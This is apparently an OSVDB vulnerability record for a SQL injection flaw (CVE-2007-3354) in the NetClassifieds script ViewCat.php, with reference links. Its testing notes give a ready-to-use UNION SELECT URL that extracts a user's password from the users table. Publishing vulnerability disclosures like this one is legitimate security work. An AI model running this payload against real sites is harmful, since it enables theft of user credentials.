NetClassifieds ViewCat.php s_user_id Multiple Variable Remote SQL Injection

2007-07-21T00:00:00
ID OSVDB:36330
Type osvdb
Reporter OSVDB
Modified 2007-07-21T00:00:00

Description

Manual Testing Notes

http://[target]/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/*

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0273.html
ISS X-Force ID: 34994
CVE-2007-3354
Bugtraq ID: 24584